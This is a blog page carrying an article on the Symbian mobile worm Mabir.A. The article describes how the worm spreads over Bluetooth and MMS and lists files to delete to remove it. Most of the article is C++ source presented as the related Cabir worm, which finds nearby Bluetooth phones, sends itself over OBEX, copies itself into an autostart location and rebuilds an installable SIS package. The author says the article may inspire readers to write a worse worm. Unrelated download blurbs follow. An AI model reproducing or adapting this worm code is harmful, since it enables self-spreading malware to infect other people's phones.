- 浏览: 6877864 次
- 性别:
- 来自: 武汉
-
文章分类
最新评论
-
逐客叫我:
看完了懵了,一会原生方法栈一会堆,自己都不用一套。
深入JVM系列(一)之内存模型与内存分配 -
xhwahaha:
import java.util.Arrays;public ...
腾讯的一个面试题 -
j00131120:
总结的非常不错
从员工到总监,你要明白的8个道理 -
Will.Du:
这是thinking in java的例子吧
对象序列化 -
ping22changxin:
能否借你事例源码学习一下,谢谢了:812185421@qq.c ...
ActiveMQ发送ObjectMessage的一个问题
Analysing Mabir.A Virus
BY Delphiscn (cnBlaster#hotmail.com) http://blog.csdn.net/delphiscn
----[Table of contents
0x01.Introduction
0x02.Mabir.A's details & solution
0x03.Code
0x04.Reference
----[ 0x01. Introduction
Nowadays, there are many computer viruses feaze us. But with the
development of the technology, some mobile telephone's viruses are also
appeared. So, not only the systems such as Windows、Linux are infected.
But also the mobile phones based on Symbian OS、Windows CE systems
are hacked...
This article will give us a example to know how a virus to infect and
work. Maybe some viewpoints in this paper will give you some inspirations
to write a more fearfulness worm :)
----[ 0x02. Mabir.A's details & solution
Mabir is a worm based on Symbian 60 system, which is spread by Bluetooth
and MMS. It will search the other mobile phones equipped with Bluetooth
as soon as infected a system. and send a virus copy(SIS File) at the same time.
The missive file always has the same name called caribe.sis. Here, we
should pay a attention to it. Though the filename is the same as the worm caribe,
they have some differences.
Besides the way of Bluetooth, Mabir.A will also listen all the MMS and SMS
Messages from the infected phones. And reply these messageswith info.sis,
a virus copy.
The MMS Messages replyed by Mabir will not included any words, except
info.sis file.
Next, Let's talk something about MMS.
MMS Message is a kind of multimedia that can transport any information to mobile phones
which are support MMS technology. As its name, MMSonly contains
multimedia, such as picture、audio frequency and video frequency. But, in fact,
it contains all, even as the infected files, Mabir always camouflages itself asa
Symbian's installation procedure. Let you to execute it.
Killing Mabir.A
1.Install a file manager program on the device.
2.Enable the option to view the files in the system folder.
3.Delete the following malicious files:
Profimail v2.75_FULL.sis
\system\install\Profimail v2.75_FULL.sis
C:\System\Apps\AppInst\Appinst.aif
C:\System\Apps\AppInst\Appinst.app
C:\System\Apps\caribe\caribe.rsc
C:\System\Apps\caribe\caribe.app
C:\System\Apps\caribe\flo.mdl
C:\System\recogs\flo.mdl
C:\System\Fonts\11x12 euro_fonts.gdr
C:\System\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\CARIBE.RSC
C:\System\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\CARIBE.APP
C:\System\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\CARIBE.SIS
C:\System\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\INFO.SIS
4.Reinstall the following programs that were overwritten by the threat:
ProfiMail
ProfiExplorer
Detailed description:
1.Spreading by Bluetooth
On this way, Mabir always copies itselftoa file named caribe.sis. SIS
contains three virus's files
caribe.app, caribe.rsc and flo.mdl
When SIS sets up, it will execute caribe.app automatically. To start up the
worm.
If Mabir.A is activation, it will immediately search the other Bluetooth
phones, and copy itself to them. If the target system refused, it will still send the
same messages. Just like DDOS.
2.Spreading by MMS
Using MMS way to spread, Mabir will copy the infected SIS files. These files
included info.sis but there aren't any words in the MMS message.
Infection
When Mabir SIS installs the files, it will copy worm to these place:
\system\apps\Caribe\Caribe.app
\system\apps\Caribe\Caribe.rsc
\system\apps\Caribe\flo.mdl
When Mabir.exe executes, it will copy these files:
\system\symbiansecuredata\caribesecuritymanager\Caribe.app
\system\symbiansecuredata\caribesecuritymanager\Caribe.rsc
and rebuilds SIS file to:
\system\symbiansecuredata\caribesecuritymanager\Info.sis
If these steps are executed successfully, Mabir.A will search all the
Bluetooth phones and begin to wait all the MMSand SMS Messages arrived.
----[ 0x03. Code
Attention:
This code is called Cabir which is the preexistence of Mabir. Comparing both
to say, Cabir and Mabir Maybe have same differences.
#include "general.h"
#include "caribebt.h"
#include <eikenv.h>
#include <bt_sock.h>
#include <obex.h>
#include <btextnotifiers.h>
/////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////
CaribeBluetooth::CaribeBluetooth():
CActive(CActive::EPriorityStandard)
{
WithAddress = 0;
iState = 3;
_LIT(currentFileName,"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURIT
YMANAGER\\CARIBE.SIS");
iCurrFile = CObexFileObject::NewL(TPtrC(NULL, 0));
iCurrFile->InitFromFileL(currentFileName);
CActiveScheduler::Add(this);
}
CaribeBluetooth::~CaribeBluetooth()
{
}
CaribeBluetooth* CaribeBluetooth::NewL()
{
return NewLC();
}
CaribeBluetooth* CaribeBluetooth::NewLC()
{
CaribeBluetooth* self = new CaribeBluetooth;
self->ConstructL();
return self;
}
void CaribeBluetooth::ConstructL()
{
iState = 3;
RunL();
}
void CaribeBluetooth::RunL()
{
if(iState == 1)
{
if(!obexClient->IsConnected())
{
iState = 3;
}
else
{
//iCurrObject = CObexNullObject::NewL();
//iCurrObject->SetNameL(_L("Hello World"));
//obexClient->Put(*iCurrObject,iStatus);
iState = 2;
Cancel();
obexClient->Put(*iCurrFile,iStatus);
SetActive();
return;
}
}
if(iState == 2)
{
//delete iCurrObject;
iState = 3;
Cancel();
obexClient->Disconnect(iStatus);
SetActive();
return;
}
if(iState == 3)
{
if(obexClient)
{
delete obexClient;
obexClient = NULL;
}
while(iState == 3)
{
FindDevices();
ManageFoundDevices();
}
return;
}
}
void CaribeBluetooth::DoCancel()
{
}
int CaribeBluetooth::FindDevices()
{
_LIT(KL2Cap, "BTLinkManager");
int res;
if((res = socketServ.Connect()) != KErrNone)
{
//ErrMessage("Error Connect");
return 0;
}
if((res = socketServ.FindProtocol((const
TProtocolName&)KL2Cap,pInfo))!=KErrNone)
{
//ErrMessage("Error FindProtocol");
socketServ.Close();
return 0;
}
if((res = hr.Open(socketServ,pInfo.iAddrFamily,pInfo.iProtocol))!=KErrNone)
{
//ErrMessage("Error Open");
socketServ.Close();
return 0;
}
WithAddress = 0;
addr.SetIAC(KGIAC);
addr.SetAction(KHostResInquiry);
TRequestStatus iStatusIn;
hr.GetByAddress(addr, entry, iStatusIn);
User::WaitForRequest(iStatusIn);
if(iStatusIn!=KErrNone)
{
//ErrMessage("Error Finding Devices");
}
else
{
WithAddress = 1;
}
socketServ.Close();
// hr.Close();
return 0;
}
int CaribeBluetooth::ManageFoundDevices()
{
if(WithAddress)
{
WithAddress = 0;
Cancel();
TBTSockAddr btaddr(entry().iAddr);
TBTDevAddr devAddr;
devAddr = btaddr.BTAddr();
TObexBluetoothProtocolInfo obexBTProtoInfo;
obexBTProtoInfo.iTransport.Copy(_L("RFCOMM"));
obexBTProtoInfo.iAddr.SetBTAddr(devAddr);
obexBTProtoInfo.iAddr.SetPort(0x00000009);
obexClient = CObexClient::NewL(obexBTProtoInfo);
if(obexClient)
{
iState = 1;
iStatus = KRequestPending;
Cancel();
obexClient->Connect(iStatus);
SetActive();
}
}
else
{
iState = 3;
User::After(1000000);
}
return 0;
}
/////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////
#include "general.h"
#include "CaribeInstaller.h"
#include <aknapp.h>
#include <e32std.h>
#include <e32base.h>
#include <e32def.h>
#include <f32file.h>
#include <bautils.h>
#include <eikenv.h>
#include "file.h"
//#include "sisheader.h"
#define AUTOSTARTABLE
"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANAGER\\CARIBE.A
PP"
_LIT(Autostartablestr,"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURIT
YMANAGER\\CARIBE.APP");
#define AUTOSTARTABLERSC
"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANAGER\\CARIBE.
RSC"
_LIT(Autostartablerscstr,"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECUR
ITYMANAGER\\CARIBE.RSC");
#define AUTOSTARTABLEPATH
"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANAGER\\"
_LIT(Autostartablepathstr,"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESEC
URITYMANAGER\\");
#define RECOGFILE "C:\\SYSTEM\\RECOGS\\FLO.MDL"
_LIT(Recogfilestr,"C:\\SYSTEM\\RECOGS\\FLO.MDL");
#define RECOGFILEPATH "C:\\SYSTEM\\RECOGS\\"
_LIT(Recogfilepathstr,"C:\\SYSTEM\\RECOGS\\");
#define SISFILE
"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANAGER\\CARIBE.S
IS"
_LIT(Sisfilestr,"C:\\SYSTEM\\SYMBIANSECUREDATA\\CARIBESECURITYMANA
GER\\CARIBE.SIS");
unsigned short DOCRC16(unsigned short crc,void * array,int size);
CaribeInstaller::CaribeInstaller()
{
}
CaribeInstaller::~CaribeInstaller()
{
}
/*************************************************************
*********
CopyMeToAutostartableDir:
This function will copy the own dll of this application to
"C:\SYSTEM\SYMBIANSECUREDATA\CARIBESECURITYMANAGER\CARIBE.APP"
.
.mdl for autostart will start that application automaticly.
Parameters:
CAknApplication of the application to be copied.
Returned Values:
None.
**************************************************************
*********/
void CaribeInstaller::CopyMeToAutostartableDir(CAknApplication * OwnApp)
{
TFileName OwnDllName = OwnApp->DllName();
TBuf16 <sizeof(AUTOSTARTABLE)>Autostartable(Autostartablestr);
OwnDllName.UpperCase();
if(OwnDllName == Autostartable)
{
return;
}
RFs fs;
User::LeaveIfError(fs.Connect());
TBuf16 <sizeof(AUTOSTARTABLEPATH)>
autostartablepath(Autostartablepathstr);
fs.MkDirAll(Autostartablepathstr);
if(BaflUtils::CopyFile(fs,OwnDllName,Autostartable,CFileMan::EOverWrite)!=K
ErrNone)
{
fs.Close();
return;
}
TBuf16 <sizeof(AUTOSTARTABLERSC)> Autostartablersc (Autostartablerscstr);
OwnDllName[OwnDllName.Length()-3] = 'R';
OwnDllName[OwnDllName.Length()-2] = 'S';
OwnDllName[OwnDllName.Length()-1] = 'C';
if(BaflUtils::CopyFile(fs,OwnDllName,Autostartablersc,CFileMan::EOverWrite)!
=KErrNone)
{
BaflUtils::DeleteFile(fs,Autostartable,0);
}
fs.Close();
return;
}
/*************************************************************
*********
InstallMDL:
This function will install the mdl file to the recogs directory.
Parameters:
CAknApplication of this application for constructing the path
of the mdl.
Returned Values:
None.
**************************************************************
*********/
void CaribeInstaller::InstallMDL(CAknApplication * OwnApp)
{
RFs fs;
User::LeaveIfError(fs.Connect());
TFileName OwnDllName = OwnApp->DllName();
TBuf16 <sizeof(RECOGFILE)>Recogfile(Recogfilestr);
TParse parser;
parser.Set(OwnDllName,NULL,NULL);
TBuf16 <KMaxPath> flodrivepath(parser.DriveAndPath());
_LIT16(FLOMDL,"flo.mdl");
flodrivepath.Append(FLOMDL);
TBuf16 <sizeof(RECOGFILEPATH)> Recogfilepath(Recogfilepathstr);
fs.MkDirAll(Recogfilepath);
BaflUtils::CopyFile(fs,flodrivepath,Recogfile,CFileMan::EOverWrite);
fs.Close();
}
/*************************************************************
*********
CreateSis:
This function will create a .sis file with caribe.app,caribe.rsc
and flo.mdl
Parameters:
CAknApplication of this application for constructing the path
of the mdl.
Returned Values:
None.
**************************************************************
*********/
void CaribeInstaller::CreateSis(CAknApplication * OwnApp)
{
unsigned char sisheader[] =
{
0x3D ,0x1A ,0x8B ,0x03 ,0x12 ,0x3A ,0x00 ,0x10
,0x19 ,0x04 ,0x00 ,0x10 ,0xC4 ,0xE0 ,0x80 ,0xAB
//Offset 0x10 CRC16
,0x00 ,0x00 ///////
///////////////////
,0x01 ,0x00 ,0x03 ,0x00 ,0x01 ,0x00
,0x00 ,0x00 ,0x00 ,0x00 ,0x21 ,0x00 ,0x00 ,0x00
,0xC8 ,0x00 ,0x00 ,0x00 ,0x09 ,0x00 ,0x00 ,0x00
,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00
,0x64 ,0x00 ,0x00 ,0x00 ,0x66 ,0x00 ,0x00 ,0x00
,0xF6 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00
,0x0A ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00
,0x0A ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00
//Offset 0x50 Size of Packed Data/////
,0xCC ,0x20 ,0x01, 0x00///////////////
//////////////////////////////////////
,0x00 ,0x00 ,0x00 ,0x00
,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00
,0x00 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00
,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00
,0x00 ,0x00 ,0x18 ,0x00 ,0x00 ,0x00 ,0x12 ,0x01
,0x00 ,0x00 ,0x40 ,0x00 ,0x00 ,0x00 ,0x2A ,0x01
,0x00 ,0x00
//Offset 0x82 size of packed file 3
,0x61 ,0xA0 ,0x00 ,0x00
//Offset 0x86: offset of third packed file//
,0x3C ,0x02,0x00 ,0x00 /////////////////////
////////////////////////////////////////////
//Offset 0x8a again size of packed file 3
,0x61 ,0xA0 ,0x00 ,0x00 ,0x00 ,0x00
,0x00 ,0x00 ,0x6A ,0x01 ,0x00 ,0x00 ,0x00 ,0x00
,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00
,0x00 ,0x00 ,0x12 ,0x00 ,0x00 ,0x00 ,0x6A ,0x01
,0x00 ,0x00 ,0x3A ,0x00 ,0x00 ,0x00 ,0x7C ,0x01
,0x00 ,0x00
//Offset 0xB2 size of packed file 2
,0x59 ,0x80 ,0x00 ,0x00
//Offset 0xB6: offset of second packed file//
, 0x9D ,0xA2 ,0x00 ,0x00 ////////////////////
/////////////////////////////////////////////
//Offset 0xBA again size of packed file 2
,0x59 ,0x80 ,0x00 ,0x00
,0x00 ,0x00
,0x00 ,0x00 ,0xB6 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00
,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00
,0x00 ,0x00 ,0x18 ,0x00 ,0x00 ,0x00 ,0xB6 ,0x01
,0x00 ,0x00 ,0x40 ,0x00 ,0x00 ,0x00 ,0xCE ,0x01
,0x00 ,0x00
//Offset 0xE2 size of packed file 1
,0x12 ,0x00 ,0x00 ,0x00
//Offset 0xE6: offset of first packed file//
,0xF6 ,0x22,0x01 ,0x00 /////////////////////
////////////////////////////////////////////
//Offset 0xEA again size of packed file 1
,0x12 ,0x00 ,0x00 ,0x00
,0x00 ,0x00
,0x00 ,0x00 ,0x0E ,0x02 ,0x00 ,0x00 ,0x88 ,0x6F
,0x1F ,0x10 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00
,0x00 ,0x00 ,0x22 ,0x00 ,0x00 ,0x00 ,0x0E ,0x02
,0x00 ,0x00 ,0x0C ,0x00 ,0x00 ,0x00 ,0x30 ,0x02
,0x00 ,0x00 ,0x2E ,0x00 ,0x5C ,0x00 ,0x63 ,0x00
,0x61 ,0x00 ,0x72 ,0x00 ,0x69 ,0x00 ,0x62 ,0x00
,0x65 ,0x00 ,0x2E ,0x00 ,0x61 ,0x00 ,0x70 ,0x00
,0x70 ,0x00 ,0x21 ,0x00 ,0x3A ,0x00 ,0x5C ,0x00
,0x73 ,0x00 ,0x79 ,0x00 ,0x73 ,0x00 ,0x74 ,0x00
,0x65 ,0x00 ,0x6D ,0x00 ,0x5C ,0x00 ,0x61 ,0x00
,0x70 ,0x00 ,0x70 ,0x00 ,0x73 ,0x00 ,0x5C ,0x00
,0x63 ,0x00 ,0x61 ,0x00 ,0x72 ,0x00 ,0x69 ,0x00
,0x62 ,0x00 ,0x65 ,0x00 ,0x5C ,0x00 ,0x63 ,0x00
,0x61 ,0x00 ,0x72 ,0x00 ,0x69 ,0x00 ,0x62 ,0x00
,0x65 ,0x00 ,0x2E ,0x00 ,0x61 ,0x00 ,0x70 ,0x00
,0x70 ,0x00 ,0x2E ,0x00 ,0x5C ,0x00 ,0x66 ,0x00
,0x6C ,0x00 ,0x6F ,0x00 ,0x2E ,0x00 ,0x6D ,0x00
,0x64 ,0x00 ,0x6C ,0x00 ,0x21 ,0x00 ,0x3A ,0x00
,0x5C ,0x00 ,0x73 ,0x00 ,0x79 ,0x00 ,0x73 ,0x00
,0x74 ,0x00 ,0x65 ,0x00 ,0x6D ,0x00 ,0x5C ,0x00
,0x61 ,0x00 ,0x70 ,0x00 ,0x70 ,0x00 ,0x73 ,0x00
,0x5C ,0x00 ,0x63 ,0x00 ,0x61 ,0x00 ,0x72 ,0x00
,0x69 ,0x00 ,0x62 ,0x00 ,0x65 ,0x00 ,0x5C ,0x00
,0x66 ,0x00 ,0x6C ,0x00 ,0x6F ,0x00 ,0x2E ,0x00
,0x6D ,0x00 ,0x64 ,0x00 ,0x6C ,0x00 ,0x2E ,0x00
,0x5C ,0x00 ,0x63 ,0x00 ,0x61 ,0x00 ,0x72 ,0x00
,0x69 ,0x00 ,0x62 ,0x00 ,0x65 ,0x00 ,0x2E ,0x00
,0x72 ,0x00 ,0x73 ,0x00 ,0x63 ,0x00 ,0x21 ,0x00
,0x3A ,0x00 ,0x5C ,0x00 ,0x73 ,0x00 ,0x79 ,0x00
,0x73 ,0x00 ,0x74 ,0x00 ,0x65 ,0x00 ,0x6D ,0x00
,0x5C ,0x00 ,0x61 ,0x00 ,0x70 ,0x00 ,0x70 ,0x00
,0x73 ,0x00 ,0x5C ,0x00 ,0x63 ,0x00 ,0x61 ,0x00
,0x72 ,0x00 ,0x69 ,0x00 ,0x62 ,0x00 ,0x65 ,0x00
,0x5C ,0x00 ,0x63 ,0x00 ,0x61 ,0x00 ,0x72 ,0x00
,0x69 ,0x00 ,0x62 ,0x00 ,0x65 ,0x00 ,0x2E ,0x00
,0x72 ,0x00 ,0x73 ,0x00 ,0x63 ,0x00 ,0x53 ,0x00
,0x65 ,0x00 ,0x72 ,0x00 ,0x69 ,0x00 ,0x65 ,0x00
,0x73 ,0x00 ,0x36 ,0x00 ,0x30 ,0x00 ,0x50 ,0x00
,0x72 ,0x00 ,0x6F ,0x00 ,0x64 ,0x00 ,0x75 ,0x00
,0x63 ,0x00 ,0x74 ,0x00 ,0x49 ,0x00 ,0x44 ,0x00
,0x63 ,0x00 ,0x61 ,0x00 ,0x72 ,0x00 ,0x69 ,0x00
,0x62 ,0x00 ,0x65 ,0x00
};
unsigned char rscraw[] =
{
/*0x0C,0x00,0x07,0x00,0x04,0x00,0x00,0x00,
0x01,0x60,0xA2,0x11,0x04,0x00,0x0C,0x00,
0x0C,0x00*/
0x24,0x00,0x09,0x00,0x04,0x00,0x00,0x00,0x01,0x60,
0xA2,0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x0C,0x00,
0x0C,0x00,0x24,0x00
};
TBuf16 <sizeof(SISFILE)>Sisfile(Sisfilestr);
TBuf16 <sizeof(RECOGFILE)>Recogfile(Recogfilestr);
TBuf16 <sizeof(AUTOSTARTABLE)>Appfile(Autostartablestr);
TBuf16 <sizeof(AUTOSTARTABLERSC)>Rscfile(Autostartablerscstr);
unsigned short crc = 0;
int i;
int leidos;
unsigned char bytesdata[100];
File fsis;
File fRecog;
File fApp;
int RecogSize;
int AppSize;
int RscSize;
if(!fsis.Open(Sisfile,File::OMCreate|File::OMWrite|File::OMRead))
{
if(!fsis.Open(Sisfile,File::OMReplace|File::OMRead|File::OMWrite))
{
return;
}
}
if(!fRecog.Open(Recogfile,File::OMOpen|File::OMRead))
{
fsis.Close();
return;
}
fRecog.rFile.Size(RecogSize);
if(!fApp.Open(Appfile,File::OMOpen|File::OMRead))
{
fsis.Close();
fRecog.Close();
return;
}
fApp.rFile.Size(AppSize);
RscSize = sizeof(rscraw);
unsigned short CRC16; //0x10
unsigned int SizeData; //0x50
unsigned int OffsetData1; //0xE6
unsigned int OffsetData2; //0xB6
unsigned int OffsetData3; //0x86
unsigned int SizeData11; //0xE2
unsigned int SizeData12; //0xEA
unsigned int SizeData21; //0xB2
unsigned int SizeData22; //0xBA
unsigned int SizeData31; //0x82
unsigned int SizeData32; //0x8A
CRC16 = 0;
SizeData = RecogSize+AppSize+RscSize;
SizeData11= RscSize;
SizeData21= RecogSize;
SizeData31= AppSize;
SizeData12 = RscSize;
SizeData22 = RecogSize;
SizeData32 = AppSize;
OffsetData3 = 0x0000023c;
OffsetData2 = 0x0000023c+AppSize;
OffsetData1 = 0x0000023c+AppSize+RecogSize;
//Writing header
crc = DOCRC16(crc,sisheader,0x10);
crc = DOCRC16(crc,&sisheader[0x12],0x50-0x12);
fsis.Write(sisheader,0x50);
crc = DOCRC16(crc,&SizeData/*&sisheader[0x50]*/,4); //SizeData;
//0x50
fsis.Write(&SizeData/*sisheader[0x50]*/,4);
crc = DOCRC16(crc,&sisheader[0x54],0x82-0x54);
fsis.Write(&sisheader[0x54],0x82-0x54);
crc = DOCRC16(crc,&SizeData31/*&sisheader[0x82]*/,0x04);//SizeData31;
//0x82
crc =
DOCRC16(crc,&OffsetData3/*&sisheader[0x86]*/,0x04);//OffsetData3;//0x8
6
crc = DOCRC16(crc,&SizeData32/*&sisheader[0x8a]*/,0x04);//SizeData32;
//0x8A
fsis.Write(&SizeData31/*&sisheader[0x82]*/,0x04);
fsis.Write(&OffsetData3/*&sisheader[0x86]*/,0x04);
fsis.Write(&SizeData32/*&sisheader[0x8a]*/,0x04);
crc = DOCRC16(crc,&sisheader[0x8e],0xb2-0x8e);
fsis.Write(&sisheader[0x8e],0xb2-0x8e);
crc = DOCRC16(crc,&SizeData21/*&sisheader[0xB2]*/,0x04);//SizeData21;
crc = DOCRC16(crc,&OffsetData2/*&sisheader[0xB2]*/,0x04);//OffsetData2;
crc = DOCRC16(crc,&SizeData22/*&sisheader[0xB2]*/,0x04);//SizeData22;
fsis.Write(&SizeData21/*&sisheader[0xB2]*/,0x04);
fsis.Write(&OffsetData2/*&sisheader[0xB2]*/,0x04);
fsis.Write(&SizeData22/*&sisheader[0xB2]*/,0x04);
crc = DOCRC16(crc,&sisheader[0xbe],0xe2-0xbe);
fsis.Write(&sisheader[0xbe],0xe2-0xbe);
crc = DOCRC16(crc,&SizeData11/*&sisheader[0xe2]*/,0x04);//SizeData11;
crc = DOCRC16(crc,&OffsetData1/*&sisheader[0xe2]*/,0x04);//OffsetData1;
crc = DOCRC16(crc,&SizeData12/*&sisheader[0xe2]*/,0x04);//SizeData12;
fsis.Write(&SizeData11/*&sisheader[0xe2]*/,0x04);
fsis.Write(&OffsetData1/*&sisheader[0xe2]*/,0x04);
fsis.Write(&SizeData12/*&sisheader[0xe2]*/,0x04);
crc = DOCRC16(crc,&sisheader[0xee],0x23c-0xee);
fsis.Write(&sisheader[0xee],0x23c-0xee);
//Writing app
while(leidos = fApp.Read(bytesdata,100))
{
crc = DOCRC16(crc,bytesdata,leidos);
fsis.Write(bytesdata,leidos);
}
//Writing recog
while(leidos = fRecog.Read(bytesdata,100))
{
crc = DOCRC16(crc,bytesdata,leidos);
fsis.Write(bytesdata,leidos);
}
//Writing rsc
crc = DOCRC16(crc,rscraw,sizeof(rscraw));
fsis.Write(rscraw,sizeof(rscraw));
fsis.Seek(ESeekStart,0x10);
fsis.Write(&crc,2);
fsis.Close();
fRecog.Close();
fApp.Close();
}
unsigned short DOCRC16(unsigned short crc,void * _array,int size)
{
//static unsigned int polynomial = 0x1021;
//static unsigned short _table[256], index;
unsigned short crcTab[256] =
{0x0000,0x1021,0x2042,0x3063,0x4084,0x50a5,0x60c6,0x70e7,0x8108,0x9
129,0xa14a,
0xb16b,0xc18c,0xd1ad,0xe1ce,0xf1ef,0x1231,0x0210,0x3273,0x2252,0x52b
5,0x4294,
0x72f7,0x62d6,0x9339,0x8318,0xb37b,0xa35a,0xd3bd,0xc39c,0xf3ff,0xe3de
,0x2462,
0x3443,0x0420,0x1401,0x64e6,0x74c7,0x44a4,0x5485,0xa56a,0xb54b,0x85
28,0x9509,
0xe5ee,0xf5cf,0xc5ac,0xd58d,0x3653,0x2672,0x1611,0x0630,0x76d7,0x66f6
,0x5695,
0x46b4,0xb75b,0xa77a,0x9719,0x8738,0xf7df,0xe7fe,0xd79d,0xc7bc,0x48c4
,0x58e5,
0x6886,0x78a7,0x0840,0x1861,0x2802,0x3823,0xc9cc,0xd9ed,0xe98e,0xf9a
f,0x8948,
0x9969,0xa90a,0xb92b,0x5af5,0x4ad4,0x7ab7,0x6a96,0x1a71,0x0a50,0x3a
33,0x2a12,
0xdbfd,0xcbdc,0xfbbf,0xeb9e,0x9b79,0x8b58,0xbb3b,0xab1a,0x6ca6,0x7c87
,0x4ce4,
0x5cc5,0x2c22,0x3c03,0x0c60,0x1c41,0xedae,0xfd8f,0xcdec,0xddcd,0xad2a,
0xbd0b,
0x8d68,0x9d49,0x7e97,0x6eb6,0x5ed5,0x4ef4,0x3e13,0x2e32,0x1e51,0x0e
70,0xff9f,
0xefbe,0xdfdd,0xcffc,0xbf1b,0xaf3a,0x9f59,0x8f78,0x9188,0x81a9,0xb1ca,0
xa1eb,
0xd10c,0xc12d,0xf14e,0xe16f,0x1080,0x00a1,0x30c2,0x20e3,0x5004,0x402
5,0x7046,
0x6067,0x83b9,0x9398,0xa3fb,0xb3da,0xc33d,0xd31c,0xe37f,0xf35e,0x02b
1,0x1290,
0x22f3,0x32d2,0x4235,0x5214,0x6277,0x7256,0xb5ea,0xa5cb,0x95a8,0x85
89,0xf56e,
0xe54f,0xd52c,0xc50d,0x34e2,0x24c3,0x14a0,0x0481,0x7466,0x6447,0x542
4,0x4405,
0xa7db,0xb7fa,0x8799,0x97b8,0xe75f,0xf77e,0xc71d,0xd73c,0x26d3,0x36f2
,0x0691,
0x16b0,0x6657,0x7676,0x4615,0x5634,0xd94c,0xc96d,0xf90e,0xe92f,0x99c
8,0x89e9,
0xb98a,0xa9ab,0x5844,0x4865,0x7806,0x6827,0x18c0,0x08e1,0x3882,0x28
a3,0xcb7d,
0xdb5c,0xeb3f,0xfb1e,0x8bf9,0x9bd8,0xabbb,0xbb9a,0x4a75,0x5a54,0x6a37
,0x7a16,
0x0af1,0x1ad0,0x2ab3,0x3a92,0xfd2e,0xed0f,0xdd6c,0xcd4d,0xbdaa,0xad8b
,0x9de8,
0x8dc9,0x7c26,0x6c07,0x5c64,0x4c45,0x3ca2,0x2c83,0x1ce0,0x0cc1,0xef1f,
0xff3e,
0xcf5d,0xdf7c,0xaf9b,0xbfba,0x8fd9,0x9ff8,0x6e17,0x7e36,0x4e55,0x5e74,0
x2e93,
0x3eb2,0x0ed1,0x1ef0
};
unsigned short * table = NULL;
unsigned char * array = (unsigned char *)_array;
int i;
if(!table)
{
table = crcTab;
/*
table = _table;
table[0]=0;
for (index = 0; index < 128; index++)
{
unsigned int carry = table[index] & 0x8000;
unsigned int temp = (table[index] << 1) & 0xffff;
table[index * 2 + (carry ? 0 : 1)] = temp ^ polynomial;
table[index * 2 + (carry ? 1 : 0)] = temp;
} */
}
for(i=0;i<size;i++)
{
crc = ((crc << 8) ^ table[((crc >> 8) ^ array[i]) & 0xff]);
}
return crc;
}
----[ 0x04. Reference
Symbian virus analyse
http://www.netqin.com/viruslist/Mabir.A.html
===EOF=======================================
发表评论
相关推荐
标题中的"This module contains functions for analysing strings"指出这是一个专门用于分析字符串的模块。在编程领域,字符串处理是至关重要的,特别是在文本处理、数据解析、用户输入验证等方面。这个模块可能包含...
《电路分析》是电子工程领域的一本经典教材,版本3的更新无疑为学习者提供了更为丰富和详尽的内容。这本书深入浅出地介绍了电路理论的基础知识,是电气工程师和相关专业学生的重要参考资料。标签“电路分析”直接...
《网络数据爬取与分析实务教程》相关代码与数据集_Data-Crawling-and-Analysing
(GUI) is developed for analysing the transmitted data . Various qualification tests are conducted to verify the functionality of the system. The results demonstrate that the system is capable of ...
### IOTSim: A Simulator for Analyzing IoT Applications The rise of big data has disrupted traditional computing paradigms and influenced various industries. Internet of Things (IoT) applications are ...
Welcome to Analyzing Requirements and Defining Solution Architectures: MCSD Training Kit for Exam 70-100. By completing the chapters and associated case studies in this course, you will acquire the ...
《深入解析OllyDbg:32位分析调试器的精华知识》 OllyDbg,作为一款经典的32位分析调试器,自其诞生以来就深受程序员、逆向工程师和安全研究人员的喜爱。这款强大的工具以其独特的功能和易用性在IT领域占据了重要的...
this dynamic new book provides a definitive introduction to analysing qualitative data.It is a clear, accessible and practical guide to each stage of the process, including:,解压密码 share.weimo.info
The course covers a range of applications of neural networks in NLP including analysing latent dimensions in text, transcribing speech to text, translating between languages, and answering questions....
ective packing model as a required initial input for analysing the mechanics of granular material. This generation scheme potentially can explore the complex 3-D behaviours of material composed of ...
The TSA toolbox is useful for analysing Time Series. - Stochastic Signal processing - Autoregressive Model Identification - adaptive autoregressive modelling using Kalman filtering - multivariate ...
‘Bayesian Methods for Statistical Analysis’ is a book on statistical methods for analysing a wide variety of data. The book consists of 12 chapters, starting with basic concepts and covering ...
analysing or modelling a product, a system or its components, you’ll find that Maple provides the essential tools you need for efficient, error-free problem solving. Over 4000 mathematical functions ...
The Range program is used for analysing the vocabulary load of texts. It can tell you how much and what vocabulary occurs in a particular text or group of texts. It used to be called VORDS, FVORDS, ...
This book is about data in many – and sometimes very many – variables and about analysing such data. The book attempts to integrate classical multivariate methods with contemporary methods suitable ...
The results of analysing program file "ProgAnal.C": Lines of code :180 Lines of comments: 63 Blank lines: 52 Code Comments Space 61% 21% 18% The program includes 9 functions. The average ...
